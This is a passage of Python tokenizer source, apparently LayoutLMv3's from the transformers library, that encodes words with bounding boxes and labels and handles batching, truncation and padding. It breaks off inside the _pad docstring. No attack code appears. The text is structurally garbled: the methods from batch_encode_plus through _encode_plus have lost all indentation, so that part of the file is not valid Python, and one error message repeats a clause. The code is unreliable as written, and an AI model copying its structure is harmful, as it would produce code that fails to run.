        text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
        boxes: Union[List[List[int]], List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs,
    ) -> BatchEncoding:
        """
        Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
        sequences with word-level normalized bounding boxes and optional labels.

        Args:
            text (`str`, `List[str]`, `List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
                (words of a single example or questions of a batch of examples) or a list of list of strings (batch of
                words).
            text_pair (`List[str]`, `List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
                (pretokenized string).
            boxes (`List[List[int]]`, `List[List[List[int]]]`):
                Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
            word_labels (`List[int]`, `List[List[int]]`, *optional*):
                Word-level integer labels (for token classification tasks such as FUNSD, CORD).
        """

        # Input type checking for clearer error
        def _is_valid_text_input(t):
            if isinstance(t, str):
                # Strings are fine
                return True
            elif isinstance(t, (list, tuple)):
                # List are fine as long as they are...
                if len(t) == 0:
                    # ... empty
                    return True
                elif isinstance(t[0], str):
                    # ... list of strings
                    return True
                elif isinstance(t[0], (list, tuple)):
                    # ... list with an empty list or with a list of strings
                    return len(t[0]) == 0 or isinstance(t[0][0], str)
                else:
                    return False
            else:
                return False

        if text_pair is not None:
            # in case text + text_pair are provided, text = questions, text_pair = words
            if not _is_valid_text_input(text):
                raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
            if not isinstance(text_pair, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        else:
            # in case only text is provided => must be words
            if not isinstance(text, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )

        # Batched input: a list of questions (when text_pair is given), or a list
        # of pretokenized examples (list of lists) otherwise.
        if text_pair is not None:
            is_batched = isinstance(text, (list, tuple))
        else:
            is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))

        # `words` are what the bounding boxes must align with, one box per word.
        words = text if text_pair is None else text_pair
        if boxes is None:
            raise ValueError("You must provide corresponding bounding boxes")
        if is_batched:
            if len(words) != len(boxes):
                raise ValueError("You must provide words and boxes for an equal amount of examples")
            for words_example, boxes_example in zip(words, boxes):
                if len(words_example) != len(boxes_example):
                    raise ValueError("You must provide as many words as there are bounding boxes")
        else:
            if len(words) != len(boxes):
                raise ValueError("You must provide as many words as there are bounding boxes")

        if is_batched:
            if text_pair is not None and len(text) != len(text_pair):
                raise ValueError(
                    f"batch length of `text`: {len(text)} does not match batch length of `text_pair`:"
                    f" {len(text_pair)}."
                )
            # Dispatch to the batch API, zipping questions with their word lists when present.
            batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
            is_pair = bool(text_pair is not None)
            return self.batch_encode_plus(
                batch_text_or_text_pairs=batch_text_or_text_pairs,
                is_pair=is_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
        else:
            return self.encode_plus(
                text=text,
                text_pair=text_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.batch_encode_plus
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._batch_encode_plus
def _batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers. "
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast."
)
batch_outputs = self._batch_prepare_for_model(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=return_tensors,
verbose=verbose,
)
return BatchEncoding(batch_outputs)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._batch_prepare_for_model
def _batch_prepare_for_model(
self,
batch_text_or_text_pairs,
is_pair: bool = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[str] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_length: bool = False,
verbose: bool = True,
) -> BatchEncoding:
"""
Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. It
adds special tokens, truncates sequences if overflowing while taking into account the special tokens and
manages a moving window (with user defined stride) for overflowing tokens.
Args:
batch_ids_pairs: list of tokenized input ids or input ids pairs
"""
batch_outputs = {}
for idx, example in enumerate(zip(batch_text_or_text_pairs, boxes)):
batch_text_or_text_pair, boxes_example = example
outputs = self.prepare_for_model(
batch_text_or_text_pair[0] if is_pair else batch_text_or_text_pair,
batch_text_or_text_pair[1] if is_pair else None,
boxes_example,
word_labels=word_labels[idx] if word_labels is not None else None,
add_special_tokens=add_special_tokens,
padding=PaddingStrategy.DO_NOT_PAD.value, # we pad in batch afterward
truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=None, # we pad in batch afterward
return_attention_mask=False, # we pad in batch afterward
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=None, # We convert the whole batch to tensors at the end
prepend_batch_axis=False,
verbose=verbose,
)
for key, value in outputs.items():
if key not in batch_outputs:
batch_outputs[key] = []
batch_outputs[key].append(value)
batch_outputs = self.pad(
batch_outputs,
padding=padding_strategy.value,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
)
batch_outputs = BatchEncoding(batch_outputs, tensor_type=return_tensors)
return batch_outputs
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.encode
def encode(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> List[int]:
encoded_inputs = self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
return encoded_inputs["input_ids"]
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.encode_plus
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
`__call__` should be used instead.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (`List[str]` or `List[int]`, *optional*):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._encode_plus
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers. "
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast. "
"More information on available tokenizers at "
"https://github.com/huggingface/transformers/pull/2674"
)
return self.prepare_for_model(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding_strategy.value,
truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
prepend_batch_axis=True,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
verbose=verbose,
)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    def prepare_for_model(
        self,
        text: Union[TextInput, PreTokenizedInput],
        text_pair: Optional[PreTokenizedInput] = None,
        boxes: Optional[List[List[int]]] = None,
        word_labels: Optional[List[int]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        prepend_batch_axis: bool = False,
        **kwargs,
    ) -> BatchEncoding:
        """
        Prepares a sequence or a pair of sequences so that it can be used by the model. It adds special tokens,
        truncates sequences if overflowing while taking into account the special tokens and manages a moving window
        (with user defined stride) for overflowing tokens. Please Note, for *text_pair* different than `None` and
        *truncation_strategy = longest_first* or `True`, it is not possible to return overflowing tokens. Such a
        combination of arguments will raise an error.
        Word-level `boxes` are turned into token-level `bbox`. If provided, word-level `word_labels` are turned into
        token-level `labels`. The word label is used for the first token of the word, while remaining tokens are
        labeled with -100, such that they will be ignored by the loss function.
        Args:
            text (`str`, `List[str]`, `List[List[str]]`):
                The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
            text_pair (`List[str]` or `List[int]`, *optional*):
                Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
                list of list of strings (words of a batch of examples).
        """
        # Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
        padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
            padding=padding,
            truncation=truncation,
            max_length=max_length,
            pad_to_multiple_of=pad_to_multiple_of,
            verbose=verbose,
            **kwargs,
        )
        # Parallel accumulators: `tokens`/`token_boxes` for the first sequence,
        # `pair_tokens`/`pair_token_boxes` for the optional second one, `labels`
        # for token-level classification labels of the first sequence.
        tokens = []
        pair_tokens = []
        token_boxes = []
        pair_token_boxes = []
        labels = []
        if text_pair is None:
            if word_labels is None:
                # CASE 1: document image classification (training + inference) + CASE 2: token classification (inference)
                for word, box in zip(text, boxes):
                    if len(word) < 1:  # skip empty words
                        continue
                    word_tokens = self.tokenize(word)
                    tokens.extend(word_tokens)
                    # Every subword token of a word shares that word's bounding box.
                    token_boxes.extend([box] * len(word_tokens))
            else:
                # CASE 2: token classification (training)
                for word, box, label in zip(text, boxes, word_labels):
                    if len(word) < 1:  # skip empty words
                        continue
                    word_tokens = self.tokenize(word)
                    tokens.extend(word_tokens)
                    token_boxes.extend([box] * len(word_tokens))
                    if self.only_label_first_subword:
                        # Use the real label id for the first token of the word, and padding ids for the remaining tokens
                        labels.extend([label] + [self.pad_token_label] * (len(word_tokens) - 1))
                    else:
                        labels.extend([label] * len(word_tokens))
        else:
            # CASE 3: document visual question answering (inference)
            # text = question
            # text_pair = words
            # The question tokens carry no layout information, so they all get the pad box.
            tokens = self.tokenize(text)
            token_boxes = [self.pad_token_box for _ in range(len(tokens))]
            for word, box in zip(text_pair, boxes):
                if len(word) < 1:  # skip empty words
                    continue
                word_tokens = self.tokenize(word)
                pair_tokens.extend(word_tokens)
                pair_token_boxes.extend([box] * len(word_tokens))
        # Create ids + pair_ids
        ids = self.convert_tokens_to_ids(tokens)
        pair_ids = self.convert_tokens_to_ids(pair_tokens) if pair_tokens else None
        # Overflowing tokens cannot be reconstructed when truncation interleaves removals
        # from both sequences, hence this combination is rejected up front.
        if (
            return_overflowing_tokens
            and truncation_strategy == TruncationStrategy.LONGEST_FIRST
            and pair_ids is not None
        ):
            raise ValueError(
                "Not possible to return overflowing tokens for pair of sequences with the "
                "`longest_first`. Please select another truncation strategy than `longest_first`, "
                "for instance `only_second` or `only_first`."
            )
        # Compute the total size of the returned encodings
        pair = bool(pair_ids is not None)
        len_ids = len(ids)
        len_pair_ids = len(pair_ids) if pair else 0
        total_len = len_ids + len_pair_ids + (self.num_special_tokens_to_add(pair=pair) if add_special_tokens else 0)
        # Truncation: Handle max sequence length
        overflowing_tokens = []
        overflowing_token_boxes = []
        overflowing_labels = []
        if truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE and max_length and total_len > max_length:
            # Truncate all parallel lists consistently; boxes and labels follow the ids.
            (
                ids,
                token_boxes,
                pair_ids,
                pair_token_boxes,
                labels,
                overflowing_tokens,
                overflowing_token_boxes,
                overflowing_labels,
            ) = self.truncate_sequences(
                ids,
                token_boxes,
                pair_ids=pair_ids,
                pair_token_boxes=pair_token_boxes,
                labels=labels,
                num_tokens_to_remove=total_len - max_length,
                truncation_strategy=truncation_strategy,
                stride=stride,
            )
        if return_token_type_ids and not add_special_tokens:
            raise ValueError(
                "Asking to return token_type_ids while setting add_special_tokens to False "
                "results in an undefined behavior. Please set add_special_tokens to False "
                "results in an undefined behavior. Please set add_special_tokens to True or "
                "set return_token_type_ids to None."
            )
        # Load from model defaults
        if return_token_type_ids is None:
            return_token_type_ids = "token_type_ids" in self.model_input_names
        if return_attention_mask is None:
            return_attention_mask = "attention_mask" in self.model_input_names
        encoded_inputs = {}
        if return_overflowing_tokens:
            encoded_inputs["overflowing_tokens"] = overflowing_tokens
            encoded_inputs["overflowing_token_boxes"] = overflowing_token_boxes
            encoded_inputs["overflowing_labels"] = overflowing_labels
            encoded_inputs["num_truncated_tokens"] = total_len - max_length
        # Add special tokens
        if add_special_tokens:
            sequence = self.build_inputs_with_special_tokens(ids, pair_ids)
            token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids)
            # Special tokens get dedicated boxes: cls_token_box / sep_token_box.
            token_boxes = [self.cls_token_box] + token_boxes + [self.sep_token_box]
            if pair_token_boxes:
                pair_token_boxes = [self.sep_token_box] + pair_token_boxes + [self.sep_token_box]
            token_boxes = token_boxes + pair_token_boxes if pair else token_boxes
            if labels:
                # Special token positions are labeled with the padding label so the loss ignores them.
                labels = [self.pad_token_label] + labels + [self.pad_token_label]
        else:
            sequence = ids + pair_ids if pair else ids
            token_type_ids = [0] * len(ids) + ([0] * len(pair_ids) if pair else [])
            token_boxes = token_boxes + pair_token_boxes if pair else token_boxes
        # Build output dictionary
        encoded_inputs["input_ids"] = sequence
        encoded_inputs["bbox"] = token_boxes
        if return_token_type_ids:
            encoded_inputs["token_type_ids"] = token_type_ids
        if return_special_tokens_mask:
            if add_special_tokens:
                encoded_inputs["special_tokens_mask"] = self.get_special_tokens_mask(ids, pair_ids)
            else:
                encoded_inputs["special_tokens_mask"] = [0] * len(sequence)
        if labels:
            encoded_inputs["labels"] = labels
        # Check lengths
        self._eventual_warn_about_too_long_sequence(encoded_inputs["input_ids"], max_length, verbose)
        # Padding
        if padding_strategy != PaddingStrategy.DO_NOT_PAD or return_attention_mask:
            encoded_inputs = self.pad(
                encoded_inputs,
                max_length=max_length,
                padding=padding_strategy.value,
                pad_to_multiple_of=pad_to_multiple_of,
                return_attention_mask=return_attention_mask,
            )
        if return_length:
            encoded_inputs["length"] = len(encoded_inputs["input_ids"])
        batch_outputs = BatchEncoding(
            encoded_inputs, tensor_type=return_tensors, prepend_batch_axis=prepend_batch_axis
        )
        return batch_outputs
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.truncate_sequences
    def truncate_sequences(
        self,
        ids: List[int],
        token_boxes: List[List[int]],
        pair_ids: Optional[List[int]] = None,
        pair_token_boxes: Optional[List[List[int]]] = None,
        labels: Optional[List[int]] = None,
        num_tokens_to_remove: int = 0,
        truncation_strategy: Union[str, TruncationStrategy] = "longest_first",
        stride: int = 0,
    ) -> Tuple[List[int], List[int], List[int]]:
        """
        Truncates a sequence pair in-place following the strategy.
        Args:
            ids (`List[int]`):
                Tokenized input ids of the first sequence. Can be obtained from a string by chaining the `tokenize` and
                `convert_tokens_to_ids` methods.
            token_boxes (`List[List[int]]`):
                Bounding boxes of the first sequence.
            pair_ids (`List[int]`, *optional*):
                Tokenized input ids of the second sequence. Can be obtained from a string by chaining the `tokenize`
                and `convert_tokens_to_ids` methods.
            pair_token_boxes (`List[List[int]]`, *optional*):
                Bounding boxes of the second sequence.
            labels (`List[int]`, *optional*):
                Labels of the first sequence (for token classification tasks).
            num_tokens_to_remove (`int`, *optional*, defaults to 0):
                Number of tokens to remove using the truncation strategy.
            truncation_strategy (`str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
                The strategy to follow for truncation. Can be:
                - `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
                  maximum acceptable input length for the model if that argument is not provided. This will truncate
                  token by token, removing a token from the longest sequence in the pair if a pair of sequences (or a
                  batch of pairs) is provided.
                - `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
                  maximum acceptable input length for the model if that argument is not provided. This will only
                  truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
                - `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
                  maximum acceptable input length for the model if that argument is not provided. This will only
                  truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
                - `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths greater
                  than the model maximum admissible input size).
            stride (`int`, *optional*, defaults to 0):
                If set to a positive number, the overflowing tokens returned will contain some tokens from the main
                sequence returned. The value of this argument defines the number of additional tokens.
        Returns:
            `Tuple[List[int], List[int], List[int]]`: The truncated `ids`, the truncated `pair_ids` and the list of
            overflowing tokens. Note: The *longest_first* strategy returns empty list of overflowing tokens if a pair
            of sequences (or a batch of pairs) is provided.
        """
        # Nothing to remove: return the inputs untouched with empty overflow lists.
        if num_tokens_to_remove <= 0:
            return ids, token_boxes, pair_ids, pair_token_boxes, labels, [], [], []
        # Accept either the string alias or the enum member for the strategy.
        if not isinstance(truncation_strategy, TruncationStrategy):
            truncation_strategy = TruncationStrategy(truncation_strategy)
        overflowing_tokens = []
        overflowing_token_boxes = []
        overflowing_labels = []
        # LONGEST_FIRST without a pair degenerates to ONLY_FIRST, so both are handled here.
        if truncation_strategy == TruncationStrategy.ONLY_FIRST or (
            truncation_strategy == TruncationStrategy.LONGEST_FIRST and pair_ids is None
        ):
            if len(ids) > num_tokens_to_remove:
                # The overflow window keeps `stride` extra tokens from the kept part
                # so consecutive windows overlap.
                window_len = min(len(ids), stride + num_tokens_to_remove)
                overflowing_tokens = ids[-window_len:]
                overflowing_token_boxes = token_boxes[-window_len:]
                overflowing_labels = labels[-window_len:]
                # Boxes and labels are truncated in lockstep with the ids.
                ids = ids[:-num_tokens_to_remove]
                token_boxes = token_boxes[:-num_tokens_to_remove]
                labels = labels[:-num_tokens_to_remove]
            else:
                error_msg = (
                    f"We need to remove {num_tokens_to_remove} to truncate the input "
                    f"but the first sequence has a length {len(ids)}. "
                )
                if truncation_strategy == TruncationStrategy.ONLY_FIRST:
                    error_msg = (
                        error_msg + "Please select another truncation strategy than "
                        f"{truncation_strategy}, for instance 'longest_first' or 'only_second'."
                    )
                logger.error(error_msg)
        elif truncation_strategy == TruncationStrategy.LONGEST_FIRST:
            logger.warning(
                "Be aware, overflowing tokens are not returned for the setting you have chosen,"
                f" i.e. sequence pairs with the '{TruncationStrategy.LONGEST_FIRST.value}' "
                "truncation strategy. So the returned list will always be empty even if some "
                "tokens have been removed."
            )
            # Remove one token at a time from whichever sequence is currently longer.
            for _ in range(num_tokens_to_remove):
                if pair_ids is None or len(ids) > len(pair_ids):
                    ids = ids[:-1]
                    token_boxes = token_boxes[:-1]
                    labels = labels[:-1]
                else:
                    pair_ids = pair_ids[:-1]
                    pair_token_boxes = pair_token_boxes[:-1]
        elif truncation_strategy == TruncationStrategy.ONLY_SECOND and pair_ids is not None:
            if len(pair_ids) > num_tokens_to_remove:
                window_len = min(len(pair_ids), stride + num_tokens_to_remove)
                overflowing_tokens = pair_ids[-window_len:]
                overflowing_token_boxes = pair_token_boxes[-window_len:]
                pair_ids = pair_ids[:-num_tokens_to_remove]
                pair_token_boxes = pair_token_boxes[:-num_tokens_to_remove]
            else:
                logger.error(
                    f"We need to remove {num_tokens_to_remove} to truncate the input "
                    f"but the second sequence has a length {len(pair_ids)}. "
                    f"Please select another truncation strategy than {truncation_strategy}, "
                    "for instance 'longest_first' or 'only_first'."
                )
        return (
            ids,
            token_boxes,
            pair_ids,
            pair_token_boxes,
            labels,
            overflowing_tokens,
            overflowing_token_boxes,
            overflowing_labels,
        )
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._pad
    def _pad(
        self,
        encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
        max_length: Optional[int] = None,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        pad_to_multiple_of: Optional[int] = None,
        return_attention_mask: Optional[bool] = None,
    ) -> dict:
        """
        Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
        Args:
            encoded_inputs:
                Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
            max_length: maximum length of the returned list and optionally padding length (see below).
                Will truncate by taking into account the special tokens.
            padding_strategy: PaddingStrategy to use for padding.
                - PaddingStrategy.LONGEST Pad to the longest sequence in the batch
                - PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
                - PaddingStrategy.DO_NOT_PAD: Do not pad
                The tokenizer padding sides are defined in self.padding_side:
                - 'left': pads on the left of the sequences
                - 'right': pads on the right of the sequences
            pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
